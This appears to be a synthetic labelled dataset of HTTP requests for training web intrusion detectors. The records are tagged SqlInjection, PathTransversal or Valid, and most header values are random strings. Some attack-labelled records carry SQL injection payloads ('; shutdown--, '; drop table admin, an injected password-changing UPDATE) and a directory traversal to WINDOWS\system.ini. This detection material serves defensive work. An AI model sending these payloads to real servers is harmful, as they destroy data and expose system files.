Accept-Language: mqe0Dtog-nsl6eeT;q=0.2, ffh-nirtS;q=0.4, goRe1sT-dsz, ws-o, aautrdh-0Rti
Cache-Control: no-transform
Client-ip: 149.133.119.108
Cookie: lseeyuiiwtptim=iri:sMns;HdGW1Sd=8072;w6dorennRn=sSvnifihlltii;eitYateccnWe=Ntvtcqelvns4i
Cookie2: $Version="073"
Date: Wed, 18 Apr 07 13:23:28 GMT
ETag: "wRJ@LeH28t9WJmteX1"
Expect: beeepata=O503do;rmagetie
From: heIinnsa@oahcE7tm6m.cz
If-Modified-Since: Mon, 02 Mar 09 12:45:14 GMT
If-Unmodified-Since: Tue, 14 Apr 09 11:48:35 CET
If-Match: "IfUvpCSx2-ItSCJn4qq2"
If-None-Match: "@nXv3OGmTIP_@ISF56U"
If-Range: Sat, 01 Mar 08 19:30:30 UTC
Max-Forwards: 773
MIME-Version: 3.5
Pragma: t9ttj4os='etMfCEe'
Proxy-Authorization: Digest nonce
Authorization: c24d hfsait=shshcn
Range: -390702,-162,16550-
Referer: http://www.eybs.be/siaedM4t/s0pa34/ie9sgi/Tea9i.mdb
TE: chunked;q=0.1,trailers,trailers
Trailer: Via
User-Agent: soOEl_F5_o http://www.7Hee.it
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 072x4241
Via: 2.1 www.i8ptj.html
Transfer-Encoding: gzip
Upgrade: 1to/8.7, hEen5n/0.3
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 74857144808284221
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38847
Start - Id: 41233
class: SqlInjection
GET /zb9rYQbpAvXh7iAECdpP.jpeg?f5ersuaacac5eC6=0DG1h.BKW-vf&kW5nph-MBinsert3=oah&iqa=r4ian&siaisrhJn5meyiE=nutsapOTingo&xie7ats=679114&ttcaeies=n9jz8m&hnsdk7cLeey6=ilaeh&yehnbtaso=TizhS5%29sock_stream&net3saaht0ena=eihrtda&gjni=0aats%3Be&It=235&cileo=-deleteEeaP0siy&tkiiiB=a0lazen HTTP/1.1
Host: 191.244.29.191:442
Connection: Nbehrei
Accept: */*;q=0.1
Accept-Charset: shift_jis;q=0.8, iso-8859-6;q=0.1, iso-8859-8-i
Accept-Encoding: ;alter     table     stge   set     password  =   'ooq' where     name  =    'oGshegs';
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 60.161.90.58
Cookie: Ths2srZegbi3=ht;yauiswntfil=a-LJ3DzA2l;afLqan1=bRWH8VYm;o6WynI_0x@M=ldseseataf9ow
Cookie2: $Version="15"
Date: Fri, 20 Nov 09 01:32:19 UTC
ETag: W/"XdV3nJlt1c6y2G4"
Expect: 20shirg=aNlhi4Re
From: hsk6aaig@oo1it1ta.gov
If-Modified-Since: Wed, 16 Jun 04 06:01:05 UTC
If-Unmodified-Since: Mon, 19 Jul 04 23:37:05 UTC
If-Match: *
If-None-Match: "ct5Uk4IMFHzYFAFPiw"
If-Range: "Xad@HHkg9PT8ZnQ"
Max-Forwards: 7
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Basic Yzloa21oajg6aHRMcg==
Authorization: NTLM N0ZlM3NlcW50MWVleWl5ZWxhc2VsbWVtc3RvcnNzZGVzYVRudG5tM2xJc0Z0YXQ=
Range: 710465-
Referer: http://Tdaegmt.uk/athnne/fe6S/2asa/ceebt.txt
TE: chunked,deflate
Trailer: Accept-Encoding
User-Agent: he8tHsn (iZEu1_4G)
UA-CPU: MIPS
UA-Disp: 940,2353,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 598x7537
Via: 0.8 102.77.184.105, 8htsi/5.2 www.ohvlt.css:2976, FTP/6.9 171.67.230.48
Transfer-Encoding: identity
Upgrade: e6be/2.5
X-Forwarded-For: 53.10.114.237
X-Serial-Number: 185711
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41233
Start - Id: 41930
class: SqlInjection
GET /eMskBq-0OB7/CVXEpYo9MhttpsusrUuwp/lSCAtBm9xrEi7IONQF/emNkmM@GlY@B-7f_u/gwi.htm?hco8n=%27%3B++shutdown--&aAdselis=82972366 HTTP/1.0
Host: 184.134.218.32
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 167.205.9.192
Cookie: iiabsn1pft5a=v ;aac=window.openi Ot7oltdocumentmochar\si
Cookie2: $Version="26"
Date: Wed, 22 Aug 07 19:23:30 UTC
ETag: W/"Ci4RWVLC8tPOT6tYZaTt"
Expect: 100-continue
From: m9He0on@mdltezsc.org
If-Modified-Since: Thu, 09 Oct 08 13:01:50 CET
If-Unmodified-Since: Fri, 30 Mar 07 13:32:35 CET
If-Match: "gezxUR8lLgf2Vj4_"
If-None-Match: "86NMV@.8B3FpIztt1"
If-Range: Tue, 14 Sep 04 14:40:46 UTC
Max-Forwards: 3
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM aWpBVDRyVWhiaUFpZW5lZkltd3ROSHd1cjFpYXp0cmV5MGxtQWFwY2Jnb3I=
Authorization: qm5t ecesdu=orTms
Range: 230210-,74601-,-666
Referer: /tie0fila.avi
TE: trailers,chunked,chunked
Trailer: If-Unmodified-Since
User-Agent: pedlcft6 (j3.MiY_qy; oZlZ.ZmfTG; w3Bfhqc_)
UA-CPU: 68000
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 724x022
Via: HTTP/6.0 www.seojecs.html, FTP/8.2 137.134.85.162:9, 0.6 www.oa8b4nt.js:819
Transfer-Encoding: gzip
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 169.141.62.144
X-Serial-Number: 850343
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41930
Start - Id: 46020
class: PathTransversal
POST /ruuUhIncFKphj/7ooadtitiva/4H0vd6U@L9Dg/iz-9C.css? HTTP/1.0
Content-Length: 134
Content-Language: 5rPdt
Content-Encoding: compress
Content-Location: /s7ua.tar.gz
Content-MD5: U3NuZ29sOTB0OGNvd3RoYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Dec 05 01:05:45 CET
Last-Modified: Tue, 12 Sep 06 21:25:03 UTC
Host: 52.137.192.52:22
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-874, x-mac-chinesesimp;q=0.0, windows-1258;q=0.2
Accept-Encoding: gzip, compress, deflate;q=0.8
Accept-Language: kwe2pUh-iren, e-stetue;q=0.2
Cache-Control: no-cache
Client-ip: 110.54.124.198
Cookie: O5scriptOx6RbUDr=..\..\..\..\WINDOWS\system.ini;cyrciahebnie=7tZc
Date: Sat, 09 Oct 04 18:37:55 CET
Expect: nenTinf=oiot;tc8mks7s
If-Modified-Since: Fri, 14 Nov 08 16:39:16 UTC
If-Match: "x4aA..6jpJRu0zF2p"
If-None-Match: *
Max-Forwards: 379
Pragma: jsrGl='it'
Authorization: ge01ym jtsyF=o3plout
Referer: http://Imaf.fr/iteRc/eeSu/susOub/lqsfnb5.jpeg
User-Agent: oSoVJr http://www.osh2em.be
Via: 3.4 www.Ssr6ael.css
Transfer-Encoding: compress
X-Serial-Number: 8566384

zhsdcAti=174185&tph=5&spaymO=0549656&ielaloila=061967&J7HXUIt=xml@e&dupositionaX1i-pQPu=mob8ieHejte&itoOc=dmmzqx&ecnreehoom=fnhIxmr3

End - Id: 46020
Start - Id: 5045
class: Valid
PUT /mc/7uIv.jpeg? HTTP/1.0
Content-Length: 45
Content-Language: deu,stslrd,irseoC
Content-Encoding: deflate
Content-Location: http://www.94ekeih.it/9ahe/odlawiy/reAcn/eefcre/untUn.pdf
Content-MD5: d3VzckllaGFFdW81dHRtYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 May 06 05:52:28 UTC
Last-Modified: Sat, 19 Jul 08 04:48:34 UTC
Host: 73.162.235.86
Connection: doeto4aO
Accept: application/x-tar;q=0.5, application/*;q=0.2, video/mpeg;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.7, gzip, deflate;q=0.0, identity
Accept-Language: 4u-sw4w, elni-ace9iss;q=0.4, O2-se09ijo
Cache-Control: no-cache
Client-ip: 167.90.166.47
Cookie: cq59u=9p-giCZ1;ctatcuba=feshhsdet07neieni;Nt=-u
Cookie2: $Version="779"
Date: Sat, 17 Nov 07 11:24:31 UTC
ETag: "G.2NOI9hhXcPwm7wQe"
Expect: 100-continue
From: Qneaamdm@6uncL.it
If-Modified-Since: Fri, 14 Nov 08 08:50:39 GMT
If-Unmodified-Since: Wed, 17 Mar 10 23:53:33 CET
If-Match: "xl7i6TJR_loj_laRoZ"
If-None-Match: *
If-Range: Wed, 30 Nov 05 08:04:28 UTC
Max-Forwards: 0329
MIME-Version: 5.2
Pragma: atl=Wl
Proxy-Authorization: Digest username="diwistsp"
Authorization: Digest response="47966E291927D6cDaB2D49716ba1adc5"
Range: -809077,653-170430,-158191
Referer: http://ysrsAlcd.net/aCEe/tuopred/do0i/sTlwpm/nset.pdf
TE: trailers,deflate,chunked;q=0.3
Trailer: Pragma
User-Agent: Mozilla/5.1 (compatible; MSIE 3.2; Linux i586; Ordhnr; 6obr)
UA-CPU: StrongARM
UA-Disp: 522,847,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 561x459
Via: 5.6 25.131.7.204, 3.6 115.40.136.225:12
Transfer-Encoding: identity
Upgrade: 9Ehwn/4.8, rwi0/3.3, UStake/0.9, reEr0s/4.3
Warning: 770 107.102.226.41 "iZH9taPnr8p" 
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 4278747254
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

seule=586514&dauieulkdnajdr=SuyArey913zssne8y

End - Id: 5045
Start - Id: 34364
class: Valid
POST /eestsnew8dr2l3srr/uoCiMEftoemiQnrt/d02uoneX7Mor/rl30ucvpafe1uycnp/uhnate1.asp? HTTP/1.0
Content-Length: 213
Content-Language: n,iseitn,eoetea
Content-Encoding: compress
Content-Location: http://Sagwmd.be/tmzS/egu0snqy/e4dHs.html
Content-MD5: YWFyeWxscnhhOGFhdGVhdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Jun 06 13:22:51 GMT
Last-Modified: Sun, 14 Feb 10 05:57:45 GMT
Host: www.uref.cz
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: fwrd-rknr;q=0.6, I-pT, xsmu-l, Oea-h
Cache-Control: min-fresh=865
Client-ip: 236.235.183.17
Cookie: i3=O$i
Cookie2: $Version="24"
Date: Sun, 10 Feb 08 12:32:47 CET
ETag: "Jbe.7Cnz-Xo5NknhWt7"
Expect: 100-continue
From: lroe@j5dnTa1qd.biz
If-Modified-Since: Wed, 28 Jun 06 24:36:26 UTC
If-Unmodified-Since: Thu, 20 Jan 05 22:40:53 UTC
If-Match: "Jf9EZkcC0Mx25GsmTlo"
If-None-Match: *
If-Range: Thu, 16 Feb 06 08:32:00 GMT
Max-Forwards: 8
MIME-Version: 3.0
Pragma: lq=esnAs3
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: Basic bmt1bnNyMzpkcmh0RWli
Range: 2495-218225,-34
Referer: http://otfTkee.be/ruddtse/baeGila/E3nus/eNbuo/su4iggee.swf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.6 (Windows; U; Win 9x 8.0; ao-ti; rv:2.7.4) Gecko/66511468
UA-CPU: x86
UA-Disp: 6654,1299,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 015x732
Via: 9.4 www.tno5mn.shtml, HTTP/1.4 95.223.223.141
Transfer-Encoding: deflate
Upgrade: eoutbj/8.4, dau/7.9, Igo/3.3, ugequ/9.4
Warning: 293 www.rtrRiite.jpeg "jjzdARr7habhta13" "Sun, 15 Jun 08 16:27:29 UTC"
X-Forwarded-For: 107.108.232.99
X-Serial-Number: 71981796445551996576
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e85srroe=xp_etFdnts&e8cald4TlpnnvIF=n:selectd|T&icr2la1= o?rvdiv &irLteuh=a&EPwBY8Xd=i.Ed9c6b&hhToabseheun=3q(r& t|s|&Rc4hAf3= d5oieicopyhomeswooinate&aaon48ita3=2dipn<w0dllTlhaweo?&apit=83720420

End - Id: 34364
Start - Id: 10116
class: Valid
GET /mm/AFrijLrapttt/ey_sP4KHI0mnLvH/l7xO.cfm?dzne=scripti&h6oT.Jca=oqi&7Yk4NH7=474&nr2e5irpee5=cdObV8FHl4&feliyohssG=ai&eotn1=atsobg&RDorPdj60dxpnetcat=hy%2Fiennoe&PzcofhttpvbscriptOA9=6Q79LG&ne=n%40Rsh&Emeorde=zblaccept1tees HTTP/1.0
Host: www.auatngattt.com:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-10646-ucs-2;q=0.1, windows-1250
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.7
Cache-Control: max-age=6
Client-ip: 51.159.109.205
Cookie: bsmmmEr=as>gepo t4isq;oedwhtrvanditos=etv3dao;cL4viFq.formSt=8693;6OMTfNQ17rW=85399
Cookie2: $Version="6"
Date: Mon, 16 Feb 04 23:11:17 CET
ETag: W/"sktmPGKhc.CzN.dJazWN"
Expect: tjCfb
From: tsbr5seo@najlknme.it
If-Modified-Since: Sun, 14 Aug 05 19:18:59 CET
If-Unmodified-Since: Thu, 10 Aug 06 16:29:35 UTC
If-Match: *
If-None-Match: "jpsJvAStILDq38dX7XS"
If-Range: Sat, 05 Jul 08 22:12:05 GMT
Max-Forwards: 9325
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic ZHRzZTp0c29jY3lT
Authorization: Basic Y2VoVG5hWW46dHR1b25lb1Q=
Range: 308-,50-,44-
Referer: /lsplyh6e/geva5/edb4tpx/eeexY/N7bto.mp3
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/4.2 (compatible; MSIE 9.7; Mac OS X; skedomeiin; 4d7to)
UA-CPU: x86
UA-Disp: 5781,4681,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 117x256
Via: HTTP/0.9 247.117.57.195, 6.7 www.estr.shtml
Transfer-Encoding: gzip
Upgrade: ugRt/6.2
Warning: 385 30.24.237.210 "kiToToctkeJrblniam" 
X-Forwarded-For: 233.251.46.48
X-Serial-Number: 952791453118
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10116
Start - Id: 33861
class: Valid
POST /nL5U1JioTr/iuenaot7ft/se0AryehohJrleT/wemmnwettbX9vym/pmlitpmf6cn4IsTyu.mspx? HTTP/1.1
Content-Length: 127
Content-Language: ohthH,et,Oagocodg
Content-Encoding: compress
Content-Location: /ezos5hXa/xein/nns1n/sAsa.jsp
Content-MD5: dmV5b0xuMXJmaXRMM2hlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jan 04 02:11:26 CET
Last-Modified: Sun, 23 Nov 08 21:40:02 CET
Host: www.ctdycf.uk:81
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-2;q=0.8, x-mac-hebrew
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 172.17.143.228
Cookie: Eai04ep=5;0ueEEwstos4Uzr= oia)teopen
Cookie2: $Version="133"
Date: Mon, 23 Jul 07 04:31:45 UTC
ETag: "fQ-1cn8ZVzi.yxkm"
Expect: 100-continue
From: tdove@2rii.it
If-Modified-Since: Tue, 07 Nov 06 11:43:58 CET
If-Unmodified-Since: Sat, 27 Dec 08 13:40:01 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Mar 09 01:31:43 CET
Max-Forwards: 29
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM bkRub011bndubHB6VEhoZWVoZGUxcjJuemx0eHNhZWdubGRjZmV0Nmhy
Authorization: Basic dWdoZTpydGhlZXRoYQ==
Range: -7,678208-80591,7682-2
Referer: /t2ano/6aedWUd/ytlb/Eettffwm/ciuS.jpg
TE: trailers,chunked;q=0.7
Trailer: If-Range
User-Agent: cltT/7.3
UA-CPU: MIPS
UA-Disp: 260,747,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1982x002
Via: FTP/9.9 www.on3wp0ni.shtml, 7.5 www.bodegwt.js, 8.8 67.21.22.72:76
Transfer-Encoding: identity
Upgrade: dotrMt/4.5, 3ae/5.5, deeebe/8.6, ose4e/4.6, einu/5.3
Warning: 149 www.pnpgcar.gif:63794 "ttaegM" "Wed, 05 Sep 07 15:49:05 UTC"
X-Forwarded-For: 36.38.198.62
X-Serial-Number: 562812126143349
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lezpu65dhn6r8e=lKxi8csDC&deyr=Z &1_5C.@TL=22&_nj@biF=8Vnr]aitUlibwinnt r2/&Xal=58035&Daxcs=aKPxnnGphppassthruqeyra0<o:3

End - Id: 33861
Start - Id: 33046
class: Valid
POST /zwfcrcpi0Zq3X.css? HTTP/1.1
Content-Length: 280
Content-Language: Wb,ecatt,Meu
Content-Encoding: compress
Content-Location: /eokee.css
Content-MD5: bHJ1ZWVpcmVuNHVpdnNzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Jun 04 18:51:57 UTC
Last-Modified: Tue, 28 Oct 08 05:52:35 CET
Host: 87.17.16.247
Connection: 6ofblobi
Accept: */*
Accept-Charset: windows-1255, x-mac-roman, iso-8859-9
Accept-Encoding: deflate
Accept-Language: hegsrrg-anuobA, 3hhmmg12-p;q=0.5, osreht-itteqt, baesmcA-bSge9e4u;q=0.3
Cache-Control: min-fresh=958
Client-ip: 98.78.148.36
Cookie: efetdeedtal=r-B.UD1p4;kQqil7mEnwiimd3=r
Cookie2: $Version="680"
Date: Sun, 25 Dec 05 15:29:58 GMT
ETag: W/"PwlHc3iFVdu3HcGrPnBM"
Expect: 100-continue
From: ekecyvb@mao43ira.ch
If-Modified-Since: Thu, 22 Jan 09 09:59:00 UTC
If-Unmodified-Since: Sun, 04 Jun 06 02:29:45 UTC
If-Match: *
If-None-Match: *
If-Range: "7lWz9lHoTTTm9kKvtn@"
Max-Forwards: 1
MIME-Version: 7.9
Pragma: a=aiUit
Proxy-Authorization: Basic Zk5sZXNXOm51dGF0
Authorization: quogg deae7aa=tszt
Range: -1,0950-
Referer: http://4e4a.com/1zupSNl/hftzyng/avthoe.txt
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: whtonhge7f
UA-CPU: StrongARM
UA-Disp: 6826,952,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3468x969
Via: 5.4 154.66.207.220
Transfer-Encoding: gzip
Upgrade: eabbw/5.6, t0eah/5.1, ezh/2.6
Warning: 075 223.82.165.219:270 "en9bJolpa" 
X-Forwarded-For: 242.105.173.22
X-Serial-Number: 71160
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

rb1=epfd&5c=el'ppy/>seDlsogy&saHavDcurc=wPalcnmaee&tttneiSbatf=kqFL_EP@RWKX&ra=we;&suptpa=on81de&XGg-R=eo2he&nlsuduhaoNtleof=18949554&OhtPAlmchTuHyem=)jtiran5wrece&jtreutjlO=o9BJlMObzzNd&hqerc1tlegad=9048&iZes=jvuk&telnetWHlB=z?b&t2ceaasbelDM=3ER&iAaiMesouReBez=Ij8h

End - Id: 33046
Start - Id: 19394
class: Valid
GET /7Hb__/sdfte2oeea6bemR/nofroooeDYrhudhalII/Ede8geopesslrrap/xmlxp_hxpallhEeBkZF/2gm9n/6yutieieSvf2/rmieusrdurdqEopthe3/7f3C4-i2ZTg.b/yFsPJ69vF/Zr@zVH.aZ.tiff?ler=012950055&EArr0twlfiidaan=90&lteu=optsu&ioT=paarvenoA&ItelnetS7l=260503&peiyknsd36r2=+hI3phpQi%27&SlUlocationS.img=aA1Lwj_szLeZ&dogiUitL7=6hency9t&H7eiil=shC&Sec=eniNoereo&bb=08133&ernihd=yhmeenyb%3F&ret=3 HTTP/1.1
Host: www.tina.it
Connection: close
Accept: image/*;q=0.4, video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 210.24.4.252
Cookie: nizi=401523;eiona2=17678733;CH8r=a7TFMAwK;sk=gFgM79hM
Cookie2: $Version="791"
Date: Fri, 17 Nov 06 02:33:41 UTC
ETag: "qdS-CbZjhJjqpjwv1kiK"
Expect: Ntdnrtn
From: hxnatei@dLeolra.de
If-Modified-Since: Wed, 26 Jan 05 21:34:05 GMT
If-Unmodified-Since: Tue, 02 Mar 04 18:20:12 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Jun 09 23:09:42 GMT
Max-Forwards: 74
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM aW9jckVuZWh1OXRia2xPZWF0bm13cXRSM29nZXBBcnJaYXl3bFRuaGFhc2RwQW9h
Authorization: tWzal kfatodoa=h2nsauhb
Range: 424-5049
Referer: /hqlpicti/4Naqnm/ynBera/uwS26.msf
TE: chunked,trailers,chunked;q=0.0
Trailer: If-Range
User-Agent: rtyece (glmHOWuW; oAZPp5YR.8; eznnP9csZ; m2JPkSVO; nxKyrzn1Iz)
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2934x2655
Via: HTTP/5.1 www.sea7naa.gif, 4.2 www.hnmrMei.html:46298, HTTP/3.3 www.if5ecv.png
Transfer-Encoding: lotsnn; Nl2ewx=pQnEel
Upgrade: 0hnhm/0.0
Warning: 094 31.28.84.149 "sfI0urex0ead6neeIo" 
X-Forwarded-For: 247.91.86.17
X-Serial-Number: 5993658067550
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19394
Start - Id: 2038
class: Valid
GET /iNhclenas/oqib/8ilrssi0t5xee/iX/uOO2PGBiFRi/lyeitnspt8loysedYltU/vLtelnetDtPr/nnhithagblie/iRy.YXqSNNYNrOd/7UKvuq5uD0hr/te40hQah.pl?ytsi5tldnwiyet=%29s&dcnhmnl68FTe=mc7LFKVMQCS&viizas=59251&amfyod=nrx82nueunaqeoesrh&nej=U+&ugacrcffvu=iCj6sY&gefaayuisear=8599365378&leji5ds=hsDtnaPpd&tamin6rEf=L&edtno8sh0o=81&tmts=617067483&1jUIooEDj=vFT%24+d%5Chhs%24srVoupet2&dtRersrtqs=funnmer4c HTTP/1.1
Host: 119.9.17.26
Connection: od8t
Accept: image/png;q=0.2, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.8
Cache-Control: min-fresh=08
Client-ip: 135.101.63.77
Cookie: abzt7ianCn=4ri1cimostoii;xLf=azteouo0E;tr5=14498665;SwdsrmSUPhaving=rconnectp m
Cookie2: $Version="388"
Date: Wed, 04 Mar 09 23:49:37 UTC
ETag: "7Gg8Chg7IzQUTRUG"
Expect: riad
From: occ0efi@8ll4r48z.be
If-Modified-Since: Mon, 31 Dec 07 16:41:09 CET
If-Unmodified-Since: Mon, 31 Jan 05 01:19:51 GMT
If-Match: "ar8tOQouh.dsFkU96zI2"
If-None-Match: "cEr5ys@tN0TQ28-GMsv"
If-Range: Thu, 14 Jan 10 04:27:16 UTC
Max-Forwards: 9
MIME-Version: 1.2
Pragma: oeSact='eiac2mm'
Proxy-Authorization: tytl tocUa=e3ys
Authorization: NTLM b29wZ2hmb2lzbHNpbmVqM2VvcHRleW9uZXRkbW4zaWJ0Ym5vb0VlaXc=
Range: -586766,7072-,732551-
Referer: http://tdsg.ch/nsawwc/sGrp/teaI/utli.mspx
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.2 (Windows; U; Windows NT 1.7; ej-sr; rv:4.7.5) Gecko/14341877
UA-CPU: StrongARM
UA-Disp: 5129,6449,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8738x825
Via: HTTP/5.0 166.251.72.127, 3.3 www.ncrio.html
Transfer-Encoding: gzip
Upgrade: l0e/3.9, r2qtn/3.5, ewhpe/0.7
Warning: 120 www.fagzsE.shtml "4pyaat" 
X-Forwarded-For: 18.100.221.44
X-Serial-Number: 9493584291760843409
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2038
Start - Id: 21509
class: Valid
GET /ttMggms8teftu4bnoes/etcf.shtml?ywciythsywt7IEe=aFG HTTP/1.0
Host: 181.92.205.87
Connection: keep-alive
Accept: video/*, text/html;q=0.5
Accept-Charset: x-mac-roman, gb2312
Accept-Encoding: identity;q=0.7, deflate;q=0.9, deflate
Accept-Language: *;q=0.0
Cache-Control: min-fresh=39
Client-ip: 129.114.252.94
Cookie: eoGoqpa3gel=93529;its=2hGig@t;boot.inilocationoIgW6=9stdin1jh7s;Sanedhuoirls=izL-JGdvG5jR;0buszjHeto=ur tq;totGzum7nwjhep=whOR13Zr5Ws
Cookie2: $Version="6"
Date: Wed, 17 Feb 10 19:37:27 CET
ETag: W/"iv@b4s9k5Xo4jt0E3"
Expect: 100-continue
From: 8whhees@Oeeq.net
If-Modified-Since: Thu, 21 Jan 10 08:41:32 CET
If-Unmodified-Since: Mon, 12 Jan 04 18:07:04 UTC
If-Match: *
If-None-Match: "--MaC_dgU.XFYtPv.MfZ"
If-Range: Mon, 28 Jul 08 05:05:49 UTC
Max-Forwards: 179
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM UnVpY3ZtQnNPNGh0c3luZTdlYTdsQnF0dWdpT2pvM2hpbnN6cm5paGE4ZWVp
Range: 24-99324,2256-,752-435989
Referer: http://urns8gin.ch/eaeu/hilnece/ascfndsa/tChOOon/dneqgb.bin
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 3.4; oq-oa; rv:6.5.1) Gecko/72754293
UA-CPU: Sparc
UA-Disp: 130,178,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5415x3665
Via: 3.3 88.122.80.40:2
Transfer-Encoding: compress
Upgrade: plddhm/2.0, afiewd/8.6, tst/4.7
Warning: 989 95.146.49.238 "goslds92assa6" "Thu, 02 Oct 08 01:14:20 UTC"
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21509
Start - Id: 8666
class: Valid
GET /7o/t141YUG2Mas_Vb4/dteh7bsitl/htsctcHfsalI5ai8pjN/Ktnftnb/iMVtTs.asmx?iom0faai7=723266&d3n=581&vruasmla=n2ttsr70etopUrgier%25%7E&elq4SFsrpbuUd=an&zlgiotdh=00&eoeq=os&dbJ2VNAaR=evi%25rttetf&t44P1smH2https=51290&l0tnco5ismkmo3r=84735&gtLg9.=hrhsSvsyseeut&jhaZKtamorXTstdin=objectatL%3CHgec3lnuc8&Eds7eneha=8&D@C2n0k3=yn HTTP/1.0
Host: www.j86mE.uk:2716
Connection: tcezodf
Accept: application/*, image/jpeg
Accept-Charset: utf-7, cp-950, euc-jp;q=0.3, x-mac-hebrew;q=0.2
Accept-Encoding: 
Accept-Language: ir9nu5o-j;q=0.0, 5xorniey-dfbaku, Hic-eere
Cache-Control: max-stale=5545
Client-ip: 225.249.20.48
Cookie: QOpz=hszJbZlf;o6hcbzhpb=dEa6Hs3nenhtez
Cookie2: $Version="48"
Date: Mon, 04 Jan 10 10:32:38 GMT
ETag: W/"v@BjGHevyt7Oc4t@iuz@"
Expect: 100-continue
From: Xsnt@ceTo3y.it
If-Modified-Since: Wed, 26 Aug 09 14:48:25 UTC
If-Unmodified-Since: Fri, 13 May 05 24:04:56 GMT
If-Match: *
If-None-Match: *
If-Range: "qmkciE.0UXMjCPvpgUYm"
Max-Forwards: 618
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: ns7siw llzif0=ebeiais
Authorization: 8n0yr wrdaiK=tth7z
Range: -766,58-986789
Referer: /Mignr/tAnh0rl.jpeg
TE: trailers,gzip,chunked;q=0.6
Trailer: Referer
User-Agent: fynalintrmueOcS
UA-CPU: x86
UA-Disp: 051,717,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8393x485
Via: HTTP/5.8 www.zenheEci.gif, j1i/5.8 www.peeeqh.png, HTTP/1.9 www.eTeEaa.htm
Transfer-Encoding: compress
Upgrade: eswo/1.2, 2shets/0.9, Ic4/7.0
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 252.226.202.159
X-Serial-Number: 396730650206
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8666
Start - Id: 42132
class: SqlInjection
GET /oTL/ctiqsetuixnArwlreu.shtml?larrorghiaii=892&iaeaEtbp9B=0995&e7nz=%27%3B++drop+table++++admin&_DXdiv=ela1eeth&K99z7r=419&rhIR=aL50 HTTP/1.0
Host: 94.144.65.190
Connection: ecgi
